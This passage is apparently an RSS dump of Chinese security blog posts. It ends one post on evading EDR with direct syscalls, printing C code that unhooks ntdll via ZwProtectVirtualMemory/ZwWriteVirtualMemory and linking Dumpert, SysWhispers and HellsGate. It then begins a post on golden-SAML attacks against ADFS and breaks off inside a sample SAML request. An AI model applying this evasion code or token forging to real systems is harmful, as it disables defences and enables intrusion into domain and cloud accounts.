href="https://j00ru.vexillium.org/syscalls/nt/64/" target="_blank">https://j00ru.vexillium.org/syscalls/nt/64/</a></span><span md-inline="plain" style="box-sizing: border-box;">可以查看不同系统下的syscall编号，但是直接调用syscall完成所有功能是很繁杂的，上面STFUEDR的思路我们可以看到可以调用VirtualProtectEx 和 WriteProcessMemory删除hook，但是如果这个操作也被hook了怎么，那我们就用syscall函数ZwProtectVirtualMemory 和ZwWriteVirtualMemory删除掉hook，然后后续再执行我们的恶意操作</span></p><pre spellcheck="false" lang="c++" cid="n21" mdtype="fences" style="box-sizing: border-box;overflow: visible;font-family: var(--monospace);font-size: 0.9em;break-inside: avoid;text-align: left;white-space: normal;background-image: inherit;background-position: inherit;background-size: inherit;background-repeat: inherit;background-attachment: inherit;background-origin: inherit;background-clip: inherit;background-color: rgb(248, 248, 248);border-width: 1px;border-style: solid;border-color: rgb(231, 234, 237);border-radius: 3px;padding: 8px 4px 6px;margin-bottom: 15px;margin-top: 15px;width: inherit;"><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;"><span role="presentation" cm-text="	" style="box-sizing: border-box;font-family: var(--monospace);display: inline-block;">    </span><span style="box-sizing: border-box;color: rgb(0, 0, 0);">LPVOID</span> <span style="box-sizing: border-box;color: rgb(0, 0, 0);">lpProcAddress</span> <span style="box-sizing: border-box;color: rgb(152, 26, 26);">=</span> <span style="box-sizing: border-box;color: rgb(0, 0, 0);">GetProcAddress</span>(<span style="box-sizing: border-box;color: rgb(0, 0, 0);">LoadLibrary</span>(<span style="box-sizing: border-box;color: rgb(170, 17, 17);">L"ntdll.dll"</span>), <span style="box-sizing: border-box;color: rgb(0, 0, 0);">pWinVerInfo</span><span style="box-sizing: border-box;color: rgb(152, 26, 26);">-></span><span style="box-sizing: border-box;color: rgb(0, 0, 0);">lpApiCall</span>);</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;"><span role="presentation" cm-text="	" style="box-sizing: border-box;font-family: var(--monospace);display: inline-block;">    </span><span style="box-sizing: border-box;color: rgb(0, 0, 0);">printf</span>(<span style="box-sizing: border-box;color: rgb(170, 17, 17);">"[+] %s function pointer at: 0x%p\n"</span>, <span style="box-sizing: border-box;color: rgb(0, 0, 0);">pWinVerInfo</span><span style="box-sizing: border-box;color: rgb(152, 26, 26);">-></span><span style="box-sizing: border-box;color: rgb(0, 0, 0);">lpApiCall</span>, <span style="box-sizing: border-box;color: rgb(0, 0, 0);">lpProcAddress</span>);</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;"><span role="presentation" cm-text="	" style="box-sizing: border-box;font-family: var(--monospace);display: inline-block;">    </span><span style="box-sizing: border-box;color: rgb(0, 0, 0);">printf</span>(<span style="box-sizing: border-box;color: rgb(170, 17, 17);">"[+] %s System call nr is: 0x%x\n"</span>, <span style="box-sizing: border-box;color: rgb(0, 0, 0);">pWinVerInfo</span><span style="box-sizing: border-box;color: rgb(152, 26, 26);">-></span><span style="box-sizing: border-box;color: rgb(0, 0, 0);">lpApiCall</span>, <span style="box-sizing: border-box;color: rgb(0, 0, 0);">AssemblyBytes</span>[<span style="box-sizing: border-box;color: rgb(17, 102, 68);">4</span>]);</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;"><span role="presentation" cm-text="	" style="box-sizing: border-box;font-family: var(--monospace);display: inline-block;">    </span><span style="box-sizing: border-box;color: rgb(0, 0, 0);">printf</span>(<span style="box-sizing: border-box;color: rgb(170, 17, 17);">"[+] Unhooking %s.\n"</span>, <span style="box-sizing: border-box;color: rgb(0, 0, 0);">pWinVerInfo</span><span style="box-sizing: border-box;color: rgb(152, 26, 26);">-></span><span style="box-sizing: border-box;color: rgb(0, 0, 0);">lpApiCall</span>);</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;"><span role="presentation" cm-text="	" style="box-sizing: border-box;font-family: var(--monospace);display: inline-block;">    </span><span style="box-sizing: border-box;color: rgb(0, 0, 0);">LPVOID</span> <span style="box-sizing: border-box;color: rgb(0, 0, 0);">lpBaseAddress</span> <span style="box-sizing: border-box;color: rgb(152, 26, 26);">=</span> <span style="box-sizing: border-box;color: rgb(0, 0, 0);">lpProcAddress</span>;</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;"><span role="presentation" cm-text="	" style="box-sizing: border-box;font-family: var(--monospace);display: inline-block;">    </span><span style="box-sizing: border-box;color: rgb(0, 0, 0);">ULONG</span> <span style="box-sizing: border-box;color: rgb(0, 0, 0);">OldProtection</span>, <span style="box-sizing: border-box;color: rgb(0, 0, 0);">NewProtection</span>;</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;"><span role="presentation" cm-text="	" style="box-sizing: border-box;font-family: var(--monospace);display: inline-block;">    </span><span style="box-sizing: border-box;color: rgb(0, 0, 0);">SIZE_T</span> <span style="box-sizing: border-box;color: rgb(0, 0, 0);">uSize</span> <span style="box-sizing: border-box;color: rgb(152, 26, 26);">=</span> <span style="box-sizing: border-box;color: rgb(17, 102, 68);">10</span>;</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;"><span role="presentation" cm-text="	" style="box-sizing: border-box;font-family: var(--monospace);display: inline-block;">    </span><span style="box-sizing: border-box;color: rgb(0, 0, 0);">NTSTATUS</span> <span style="box-sizing: border-box;color: rgb(0, 0, 0);">status</span> <span style="box-sizing: border-box;color: rgb(152, 26, 26);">=</span> <span style="box-sizing: border-box;color: rgb(0, 0, 0);">ZwProtectVirtualMemory</span>(<span style="box-sizing: border-box;color: rgb(0, 0, 0);">GetCurrentProcess</span>(), <span style="box-sizing: border-box;color: rgb(152, 26, 26);">&</span><span style="box-sizing: border-box;color: rgb(0, 0, 0);">lpBaseAddress</span>, <span style="box-sizing: border-box;color: rgb(152, 26, 26);">&</span><span style="box-sizing: border-box;color: rgb(0, 0, 0);">uSize</span>, <span style="box-sizing: border-box;color: rgb(0, 0, 0);">PAGE_EXECUTE_READWRITE</span>, <span style="box-sizing: border-box;color: rgb(152, 26, 26);">&</span><span style="box-sizing: border-box;color: rgb(0, 0, 0);">OldProtection</span>);</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;"><span role="presentation" cm-text="	" style="box-sizing: border-box;font-family: var(--monospace);display: inline-block;">    </span><span style="box-sizing: border-box;color: rgb(119, 0, 136);">if</span> (<span style="box-sizing: border-box;color: rgb(0, 0, 0);">status</span> <span style="box-sizing: border-box;color: rgb(152, 26, 26);">!=</span> <span style="box-sizing: border-box;color: rgb(0, 0, 0);">STATUS_SUCCESS</span>) {</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;"><span role="presentation" cm-text="	" style="box-sizing: border-box;font-family: var(--monospace);display: inline-block;">    </span><span role="presentation" cm-text="	" style="box-sizing: border-box;font-family: var(--monospace);display: inline-block;">    </span><span style="box-sizing: border-box;color: rgb(0, 0, 0);">wprintf</span>(<span style="box-sizing: border-box;color: rgb(170, 17, 17);">L"[!] ZwProtectVirtualMemory failed.\n"</span>);</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;"><span role="presentation" cm-text="	" style="box-sizing: border-box;font-family: var(--monospace);display: inline-block;">    </span><span role="presentation" cm-text="	" style="box-sizing: border-box;font-family: var(--monospace);display: inline-block;">    </span><span style="box-sizing: border-box;color: rgb(119, 0, 136);">return</span> <span style="box-sizing: border-box;color: rgb(0, 0, 0);">FALSE</span>;</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">}</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;"><span role="presentation" cm-text="	" style="box-sizing: border-box;font-family: var(--monospace);display: inline-block;">    </span><span style="box-sizing: border-box;color: rgb(0, 0, 0);">status</span> <span style="box-sizing: border-box;color: rgb(152, 26, 26);">=</span> <span style="box-sizing: border-box;color: rgb(0, 0, 0);">ZwWriteVirtualMemory</span>(<span style="box-sizing: border-box;color: rgb(0, 0, 0);">GetCurrentProcess</span>(), <span style="box-sizing: border-box;color: rgb(0, 0, 0);">lpProcAddress</span>, (<span style="box-sizing: border-box;color: rgb(0, 0, 0);">PVOID</span>)<span style="box-sizing: border-box;color: rgb(0, 0, 0);">AssemblyBytes</span>, <span style="box-sizing: border-box;color: rgb(119, 0, 136);">sizeof</span>(<span style="box-sizing: border-box;color: rgb(0, 0, 0);">AssemblyBytes</span>), <span style="box-sizing: border-box;color: rgb(0, 0, 0);">NULL</span>);</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;"><span role="presentation" cm-text="	" style="box-sizing: border-box;font-family: var(--monospace);display: inline-block;">    </span><span style="box-sizing: border-box;color: rgb(119, 0, 136);">if</span> (<span style="box-sizing: border-box;color: rgb(0, 0, 0);">status</span> <span style="box-sizing: border-box;color: rgb(152, 26, 26);">!=</span> <span style="box-sizing: border-box;color: rgb(0, 0, 0);">STATUS_SUCCESS</span>) {</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;"><span role="presentation" cm-text="	" style="box-sizing: border-box;font-family: var(--monospace);display: inline-block;">    </span><span role="presentation" cm-text="	" style="box-sizing: border-box;font-family: var(--monospace);display: inline-block;">    </span><span style="box-sizing: border-box;color: rgb(0, 0, 0);">wprintf</span>(<span style="box-sizing: border-box;color: rgb(170, 17, 17);">L"[!] ZwWriteVirtualMemory failed.\n"</span>);</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;"><span role="presentation" cm-text="	" style="box-sizing: border-box;font-family: var(--monospace);display: inline-block;">    </span><span role="presentation" cm-text="	" style="box-sizing: border-box;font-family: var(--monospace);display: inline-block;">    </span><span style="box-sizing: border-box;color: rgb(119, 0, 136);">return</span> <span style="box-sizing: border-box;color: rgb(0, 0, 0);">FALSE</span>;</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">}</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;"><span role="presentation" cm-text="	" style="box-sizing: border-box;font-family: var(--monospace);display: inline-block;">    </span><span style="box-sizing: border-box;color: rgb(0, 0, 0);">status</span> <span style="box-sizing: border-box;color: rgb(152, 26, 26);">=</span> <span style="box-sizing: border-box;color: rgb(0, 0, 0);">ZwProtectVirtualMemory</span>(<span style="box-sizing: border-box;color: rgb(0, 0, 0);">GetCurrentProcess</span>(), <span style="box-sizing: border-box;color: rgb(152, 26, 26);">&</span><span style="box-sizing: border-box;color: rgb(0, 0, 0);">lpBaseAddress</span>, <span style="box-sizing: border-box;color: rgb(152, 26, 26);">&</span><span style="box-sizing: border-box;color: rgb(0, 0, 0);">uSize</span>, <span style="box-sizing: border-box;color: rgb(0, 0, 0);">OldProtection</span>, <span style="box-sizing: border-box;color: rgb(152, 26, 26);">&</span><span style="box-sizing: border-box;color: rgb(0, 0, 0);">NewProtection</span>);</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;"><span role="presentation" cm-text="	" style="box-sizing: border-box;font-family: var(--monospace);display: inline-block;">    </span><span style="box-sizing: border-box;color: rgb(119, 0, 136);">if</span> (<span style="box-sizing: border-box;color: rgb(0, 0, 0);">status</span> <span style="box-sizing: border-box;color: rgb(152, 26, 26);">!=</span> <span style="box-sizing: border-box;color: rgb(0, 0, 0);">STATUS_SUCCESS</span>) {</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;"><span role="presentation" cm-text="	" style="box-sizing: border-box;font-family: var(--monospace);display: inline-block;">    </span><span role="presentation" cm-text="	" style="box-sizing: border-box;font-family: var(--monospace);display: inline-block;">    </span><span style="box-sizing: border-box;color: rgb(0, 0, 0);">wprintf</span>(<span style="box-sizing: border-box;color: rgb(170, 17, 17);">L"[!] ZwProtectVirtualMemory failed.\n"</span>);</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;"><span role="presentation" cm-text="	" style="box-sizing: border-box;font-family: var(--monospace);display: inline-block;">    </span><span role="presentation" cm-text="	" style="box-sizing: border-box;font-family: var(--monospace);display: inline-block;">    </span><span style="box-sizing: border-box;color: rgb(119, 0, 136);">return</span> <span style="box-sizing: border-box;color: rgb(0, 0, 0);">FALSE</span>;</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">}</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;"><span role="presentation" cm-text="	" style="box-sizing: border-box;font-family: var(--monospace);display: inline-block;">    </span><span style="box-sizing: border-box;color: rgb(119, 0, 136);">return</span> <span style="box-sizing: border-box;color: rgb(0, 0, 0);">TRUE</span>;</span></pre><p cid="n22" mdtype="paragraph" style="box-sizing: border-box;line-height: inherit;orphans: 4;margin-top: 0.8em;margin-bottom: 0.8em;white-space: pre-wrap;font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif;font-size: 16px;text-align: start;"><span md-inline="plain" style="box-sizing: border-box;">项目地址 ：</span><span md-inline="url" spellcheck="false" style="box-sizing: border-box;word-break: break-all;"><a href="https://github.com/outflanknl/Dumpert" target="_blank">https://github.com/outflanknl/Dumpert</a></span></p><h2 cid="n23" mdtype="heading" style="box-sizing: border-box;break-after: avoid-page;break-inside: avoid;orphans: 4;font-size: 1.75em;margin-top: 1rem;margin-bottom: 1rem;font-weight: bold;line-height: 1.225;cursor: text;border-bottom: 1px solid rgb(238, 238, 238);white-space: pre-wrap;font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif;text-align: start;"><span md-inline="plain" style="box-sizing: border-box;">SysWhispers</span></h2><p cid="n24" mdtype="paragraph" style="box-sizing: border-box;line-height: inherit;orphans: 4;margin-top: 0.8em;margin-bottom: 0.8em;white-space: pre-wrap;font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif;font-size: 16px;text-align: start;"><span md-inline="plain" style="box-sizing: border-box;">运行后检查系统版本并根据版本对应的系统调用表自动生成所有结构和系统调用，已经更新到第三版，主要添加了两个方法进行绕过</span></p><ul class="list-paddingleft-1" cid="n25" mdtype="list" data-mark="+" style="margin-top: 0.8em;margin-bottom: 0.8em;padding-left: 30px;font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif;font-size: 16px;text-align: start;white-space: normal;"><li style="box-sizing: border-box;"><p cid="n27" mdtype="paragraph" style="box-sizing: border-box;line-height: inherit;orphans: 4;margin-bottom: 0.5rem;white-space: pre-wrap;"><span md-inline="plain" style="box-sizing: border-box;">用占位符填充syscall位置，然后使用时动态替换</span></p></li><li style="box-sizing: border-box;"><p cid="n29" mdtype="paragraph" style="box-sizing: border-box;line-height: inherit;orphans: 4;margin-bottom: 0.5rem;white-space: pre-wrap;"><span md-inline="plain" style="box-sizing: border-box;">计算syscall地址，使函数调用后rip指针跳转到syscall的系统函数的位置上，解决edr对rip指针指向的检测</span></p></li></ul><p cid="n30" mdtype="paragraph" style="box-sizing: border-box;line-height: inherit;orphans: 4;margin-top: 0.8em;margin-bottom: 0.8em;white-space: pre-wrap;font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif;font-size: 16px;text-align: start;"><span md-inline="plain" style="box-sizing: border-box;">项目地址：</span><span md-inline="url" spellcheck="false" style="box-sizing: border-box;word-break: break-all;"><a href="https://github.com/jthuraisamy/SysWhispers" target="_blank">https://github.com/jthuraisamy/SysWhispers</a></span></p><h2 cid="n31" mdtype="heading" style="box-sizing: border-box;break-after: avoid-page;break-inside: avoid;orphans: 4;font-size: 1.75em;margin-top: 1rem;margin-bottom: 1rem;font-weight: bold;line-height: 1.225;cursor: text;border-bottom: 1px solid rgb(238, 238, 238);white-space: pre-wrap;font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif;text-align: start;"><span md-inline="plain" style="box-sizing: border-box;">HellGate</span></h2><p cid="n32" mdtype="paragraph" style="box-sizing: border-box;line-height: inherit;orphans: 4;margin-top: 0.8em;margin-bottom: 0.8em;white-space: pre-wrap;font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif;font-size: 16px;text-align: start;"><span md-inline="plain" style="box-sizing: border-box;">除了我们可以通过系统调用表去查询syscall还可以通过读取 ntdll.dll 在主机上动态找到系统调用。hellgate通过检索PEB偏移量找到启动时加载到进程中的 ntdll 通过遍历导出地址表来查找和映射系统调用</span></p><p cid="n33" mdtype="paragraph" style="box-sizing: border-box;line-height: inherit;orphans: 4;margin-top: 0.8em;margin-bottom: 0.8em;white-space: pre-wrap;font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif;font-size: 16px;text-align: start;"><span md-inline="plain" style="box-sizing: border-box;">项目地址：</span></p><p cid="n34" mdtype="paragraph" style="box-sizing: border-box;line-height: inherit;orphans: 4;margin-top: 0.8em;margin-bottom: 0.8em;white-space: pre-wrap;font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif;font-size: 16px;text-align: start;"><span md-inline="url" spellcheck="false" style="box-sizing: border-box;word-break: break-all;"><a href="https://github.com/am0nsec/HellsGate" target="_blank">https://github.com/am0nsec/HellsGate</a></span></p><p cid="n35" mdtype="paragraph" style="box-sizing: border-box;line-height: inherit;orphans: 4;margin-top: 0.8em;margin-bottom: 0.8em;white-space: pre-wrap;font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif;font-size: 16px;text-align: start;"><span md-inline="plain" style="box-sizing: border-box;">NIM版本：</span></p><p cid="n36" mdtype="paragraph" style="box-sizing: border-box;line-height: inherit;orphans: 4;margin-top: 0.8em;margin-bottom: 0.8em;white-space: pre-wrap;font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif;font-size: 16px;text-align: start;"><span md-inline="url" spellcheck="false" style="box-sizing: border-box;word-break: break-all;"><a href="https://github.com/zimawhit3/HellsGateNim" target="_blank">https://github.com/zimawhit3/HellsGateNim</a></span></p><p cid="n38" mdtype="paragraph" style="box-sizing: border-box;line-height: inherit;orphans: 4;margin-top: 0.8em;margin-bottom: 0.8em;white-space: pre-wrap;font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif;font-size: 16px;text-align: start;"><span md-inline="plain" style="box-sizing: border-box;">参考文章</span></p><p cid="n39" mdtype="paragraph" style="box-sizing: border-box;line-height: inherit;orphans: 4;margin-top: 0.8em;margin-bottom: 0.8em;white-space: pre-wrap;font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif;font-size: 16px;text-align: start;"><span md-inline="url" spellcheck="false" style="box-sizing: border-box;word-break: break-all;"><a href="https://outflank.nl/blog/2019/06/19/red-team-tactics-combining-direct-system-calls-and-srdi-to-bypass-av-edr/" target="_blank">https://outflank.nl/blog/2019/06/19/red-team-tactics-combining-direct-system-calls-and-srdi-to-bypass-av-edr/</a></span></p><p cid="n40" mdtype="paragraph" style="box-sizing: border-box;line-height: inherit;orphans: 4;margin-top: 0.8em;margin-bottom: 0.8em;white-space: pre-wrap;font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif;font-size: 16px;text-align: start;"><span md-inline="url" spellcheck="false" style="box-sizing: border-box;word-break: break-all;"><a href="https://vxug.fakedoma.in/papers/VXUG/Exclusive/HellsGate.pdf" target="_blank">https://vxug.fakedoma.in/papers/VXUG/Exclusive/HellsGate.pdf</a></span></p><p cid="n41" mdtype="paragraph" style="box-sizing: border-box;line-height: inherit;orphans: 4;margin-top: 0.8em;margin-bottom: 0.8em;white-space: pre-wrap;font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif;font-size: 16px;text-align: start;"><span md-inline="url" spellcheck="false" style="box-sizing: border-box;word-break: break-all;"><a href="https://tttang.com/archive/1464/#toc_syswhispers3" target="_blank">https://tttang.com/archive/1464/#toc_syswhispers3</a></span></p><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>



<p><a href="2247483774">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=4d9b0b72&r=1&u=http%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzUyOTI5MTM4OQ%3D%3D%26mid%3D2247483774%26idx%3D1%26sn%3D36802fb543e1b6c23f0a5a3507a26b71">跳转微信打开</a></p>

</article>
<article>
<h1>[新年特刊-年三十篇]域渗透-ADFS</h1>
<p>Sat, 21 Jan 2023 04:39:00 +0800</p>
<p>
原创 <span>侠盗鲁平</span> <span>2023-01-21 04:39</span> <span style="display: inline-block;">内蒙古</span>
</p>

<p></p>



<p>

</p>


<h2 cid="n80" mdtype="heading" style="box-sizing: border-box;break-after: avoid-page;break-inside: avoid;orphans: 4;font-size: 1.75em;margin-top: 1rem;margin-bottom: 1rem;font-weight: bold;line-height: 1.225;cursor: text;border-bottom: 1px solid rgb(238, 238, 238);white-space: pre-wrap;font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif;text-align: start;"><span md-inline="plain" style="box-sizing: border-box;">ADFS</span></h2><p cid="n81" mdtype="paragraph" style="box-sizing: border-box;line-height: inherit;orphans: 4;margin-top: 0.8em;margin-bottom: 0.8em;white-space: pre-wrap;font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif;font-size: 16px;text-align: start;"><span md-inline="plain" style="box-sizing: border-box;">基于AD的SSO单点登录，一般出现时候都是搭配o365也就是AzureAD一起使用</span></p><p cid="n82" mdtype="paragraph" style="box-sizing: border-box;line-height: inherit;orphans: 4;margin-top: 0.8em;margin-bottom: 0.8em;white-space: pre-wrap;font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif;font-size: 16px;text-align: start;"><span md-inline="image" data-src="https://s3.cn-north-1.amazonaws.com.cn/awschinablog/use-microsoft-adfs-4-0-sign-on-deployment1.jpg" style="box-sizing: border-box;min-width: 10px;min-height: 10px;word-break: break-all;font-family: monospace;vertical-align: top;display: inline-block;width: 476px;"></span></p><p cid="n83" mdtype="paragraph" style="box-sizing: border-box;line-height: inherit;orphans: 4;margin-top: 0.8em;margin-bottom: 0.8em;white-space: pre-wrap;font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif;font-size: 16px;text-align: start;"><span md-inline="plain" style="box-sizing: border-box;">因为一般而言，管理员通常会授予用户标准帐户在 AWS 或 Azure 等云环境中的高级管理权限，且ADFS在内网往往没有MFA认证（有黄金SAML的就可以忽略这点了），所以针对ADFS的攻击本质目的是</span><span md-inline="strong" style="box-sizing: border-box;"><strong style="box-sizing: border-box;">建立一条从域权限到云权限的攻击路径</strong></span></p><h2 cid="n84" mdtype="heading" style="box-sizing: border-box;break-after: avoid-page;break-inside: avoid;orphans: 4;font-size: 1.75em;margin-top: 1rem;margin-bottom: 1rem;font-weight: bold;line-height: 1.225;cursor: text;border-bottom: 1px solid rgb(238, 238, 238);white-space: pre-wrap;font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif;text-align: start;"><span md-inline="plain" style="box-sizing: border-box;">ADFSDUMP+ADFSPOOF</span></h2><p cid="n85" mdtype="paragraph" style="box-sizing: border-box;line-height: inherit;orphans: 4;margin-top: 0.8em;margin-bottom: 0.8em;white-space: pre-wrap;font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif;font-size: 16px;text-align: start;"><span md-inline="plain" style="box-sizing: border-box;">这里就要引入一个概念就是黄金SAML凭证，和金票据一样很强大的玩意，因为用户密码的修改并不会影响已生成的SAML，首先我们先来看下什么是SAML吧</span></p><pre spellcheck="false" lang="" cid="n86" mdtype="fences" style="box-sizing: border-box;overflow: visible;font-family: var(--monospace);font-size: 0.9em;break-inside: avoid;text-align: left;white-space: normal;background-image: inherit;background-position: inherit;background-size: inherit;background-repeat: inherit;background-attachment: inherit;background-origin: inherit;background-clip: inherit;background-color: rgb(248, 248, 248);border-width: 1px;border-style: solid;border-color: rgb(231, 234, 237);border-radius: 3px;padding: 8px 4px 6px;margin-bottom: 15px;margin-top: 15px;width: inherit;"><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">SAML（Security Assertion Markup Language）是一种基于XML的开放标准，允许身份提供者 (IdP) 将授权凭证传递给服务提供者 (SP)。该行话的意思是您可以使用一组凭据登录许多不同的网站。与管理电子邮件、客户关系管理 (CRM) 软件、Active Directory 等的单独登录相比，管理每个用户一个登录要简单得多。身份验证信息将在两个组件之间传递：身份提供者(ADFS) 和服务提供者（Web 应用程序）。通过身份验证后用户会带着SAML验证信息重定向到服务提供者的/SamlResponseServlet接口完成身份验证</span></pre><p cid="n87" mdtype="paragraph" style="box-sizing: border-box;line-height: inherit;orphans: 4;margin-top: 0.8em;margin-bottom: 0.8em;white-space: pre-wrap;font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif;font-size: 16px;text-align: start;"><span md-inline="image" data-src="https://nodauf.dev/p/practical-guide-for-golden-saml/saml-authentication-flow.jpg" style="box-sizing: border-box;min-width: 10px;min-height: 10px;word-break: break-all;font-family: monospace;vertical-align: top;display: inline-block;width: 476px;"></span></p><ol class="list-paddingleft-1" start="" cid="n88" mdtype="list" style="margin-top: 0.8em;margin-bottom: 0.8em;padding-left: 30px;font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif;font-size: 16px;text-align: start;white-space: normal;"><li style="box-sizing: border-box;"><p cid="n90" mdtype="paragraph" style="box-sizing: border-box;line-height: inherit;orphans: 4;margin-bottom: 0.5rem;white-space: pre-wrap;"><span md-inline="plain" style="box-sizing: border-box;">你去访问sp的某个受保护资源，比如浏览器打开： </span><span md-inline="url" spellcheck="false" style="box-sizing: border-box;word-break: break-all;"><a href="http://www.apc.com/resource1.aspx" target="_blank">http://www.apc.com/resource1.aspx</a></span><span md-inline="plain" style="box-sizing: border-box;">.</span></p></li><li style="box-sizing: border-box;"><p cid="n92" mdtype="paragraph" style="box-sizing: border-box;line-height: inherit;orphans: 4;margin-bottom: 0.5rem;white-space: pre-wrap;"><span md-inline="plain" style="box-sizing: border-box;">sp发现你是新来的，没有认证信息。当然不能给你这个页面内容了。 他就会生成一个 saml的认证请求数据包（当然是saml格式的）。把这个请求放在一个html的form的一个隐藏的域中，把这个html form返回给你。 这个form后面有一句javascript自动提交这个form。 二而form的action地址就是 提前配置好的 idp上的一个地址。 </span></p><p cid="n93" mdtype="paragraph" style="box-sizing: border-box;line-height: inherit;orphans: 4;margin-top: 0.5rem;margin-bottom: 0.5rem;white-space: pre-wrap;"><span md-inline="plain" style="box-sizing: border-box;">saml认证请求的数据包可能是这个样子的：</span></p></li></ol><pre spellcheck="false" lang="xml" cid="n94" mdtype="fences" style="box-sizing: border-box;overflow: visible;font-family: var(--monospace);font-size: 0.9em;break-inside: avoid;text-align: left;white-space: normal;background-image: inherit;background-position: inherit;background-size: inherit;background-repeat: inherit;background-attachment: inherit;background-origin: inherit;background-clip: inherit;background-color: rgb(248, 248, 248);border-width: 1px;border-style: solid;border-color: rgb(231, 234, 237);border-radius: 3px;padding: 8px 4px 6px;margin-bottom: 15px;margin-top: 15px;width: inherit;"><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;"><span style="box-sizing: border-box;color: rgb(17, 119, 0);"><</span><span style="box-sizing: border-box;color: rgb(17, 119, 0);">samlp:AuthnRequest</span></span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">    <span style="box-sizing: border-box;color: rgb(0, 0, 204);">xmlns:samlp</span>=<span style="box-sizing: border-box;color: rgb(170, 17, 17);">"urn:oasis:names:tc:SAML:2.0:protocol"</span></span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">    <span style="box-sizing: border-box;color: rgb(0, 0, 204);">xmlns:saml</span>=<span style="box-sizing: border-box;color: rgb(170, 17, 17);">"urn:oasis:names:tc:SAML:2.0:assertion"</span></span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">    <span style="box-sizing: border-box;color: rgb(0, 0, 204);">ID</span>=<span style="box-sizing: border-box;color: rgb(170, 17, 17);">"aaf23196-1773-2113-474a-fe114412ab72"</span></span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">    <span style="box-sizing: border-box;color: rgb(0, 0, 204);">Version</span>=<span style="box-sizing: border-box;color: rgb(170, 17, 17);">"2.0"</span></span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">    <span style="box-sizing: border-box;color: rgb(0, 0, 204);">IssueInstant</span>=<span style="box-sizing: border-box;color: rgb(170, 17, 17);">"2004-12-05T09:21:59"</span></span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">    <span style="box-sizing: border-box;color: rgb(0, 0, 204);">AssertionConsumerServiceIndex</span>=<span style="box-sizing: border-box;color: rgb(170, 17, 17);">"0"</span></span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">    <span style="box-sizing: border-box;color: rgb(0, 0, 204);">AttributeConsumingServiceIndex</span>=<span style="box-sizing: border-box;color: rgb(170, 17, 17);">"0"</span><span style="box-sizing: border-box;color: rgb(17, 119, 0);">></span></span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">    <span style="box-sizing: border-box;color: rgb(17, 119, 0);"><</span><span style="box-sizing: border-box;color: rgb(17, 119, 0);">saml:Issuer</span><span style="box-sizing: border-box;color: rgb(17, 119, 0);">></span><a href="https://sp.example.com/SAML2" target="_blank">https://sp.example.com/SAML2</a><span style="box-sizing: border-box;color: rgb(17, 119, 0);"></</span><span style="box-sizing: border-box;color: rgb(17, 119, 0);">saml:Issuer</span><span style="box-sizing: border-box;color: rgb(17, 119, 0);">></span></span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">    <span style="box-sizing: border-box;color: rgb(17, 119, 